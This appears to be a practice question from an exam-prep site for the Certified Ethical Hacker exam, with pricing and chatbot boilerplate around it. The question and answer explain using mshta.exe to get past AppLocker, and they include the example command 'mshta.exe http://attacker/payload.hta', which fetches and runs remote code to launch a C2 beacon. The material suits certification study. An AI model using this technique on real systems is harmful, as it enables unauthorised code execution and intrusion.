During a penetration test you obtain a non-admin shell on a Windows 10 host that enforces AppLocker rules restricting execution to signed Microsoft binaries. Your objective is to run a C2 beacon without dropping an EXE to disk. Which built-in Windows utility can you abuse to download and directly execute a remote HTA or JavaScript file in memory, thereby bypassing the AppLocker policy?
The Microsoft HTML Application Host (mshta.exe) is a signed Windows binary designed to run HTML Application (HTA) and JavaScript code. Because it is a trusted system binary, AppLocker typically allows it to execute even when other unsigned programs are blocked. By supplying a URL (for example, mshta.exe http://attacker/payload.hta), the utility retrieves the remote script and executes it entirely in memory, enabling code execution without writing a traditional executable to disk.
regsvr32.exe, wmic.exe, and certutil.exe are also legitimate binaries that can be abused, but they do not natively execute HTA or raw JavaScript files in memory. regsvr32 can run remote .sct scriptlets, wmic can start a separate process, and certutil is primarily used for file transfer and certificate management-additional steps would still be required to achieve in-memory execution of an HTA payload. Therefore, mshta.exe is the most direct choice for this scenario.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is mshta.exe and how does it work?
Open an interactive chat with Bash
How does mshta.exe bypass AppLocker policies?
Open an interactive chat with Bash
What are some limitations of mshta.exe for attackers?
Open an interactive chat with Bash
Certified Ethical Hacker (CEH)
System Hacking Phases and Attack Techniques
Your Score:
Report Issue
Bash, the Crucial Exams Chat Bot
AI Bot
Loading...
Loading...
Loading...
Pass with Confidence.
IT & Cybersecurity Package
You have hit the limits of our free tier, become a Premium Member today for unlimited access.
Military, Healthcare worker, Gov. employee or Teacher? See if you qualify for a Community Discount.
Monthly
$19.99
$19.99/mo
Billed monthly, Cancel any time.
3 Month Pass
$44.99
$14.99/mo
One time purchase of $44.99, Does not auto-renew.
MOST POPULAR
Annual Pass
$119.99
$9.99/mo
One time purchase of $119.99, Does not auto-renew.
BEST DEAL
Lifetime Pass
$189.99
One time purchase, Good for life.
What You Get
All IT & Cybersecurity Package plans include the following perks and exams .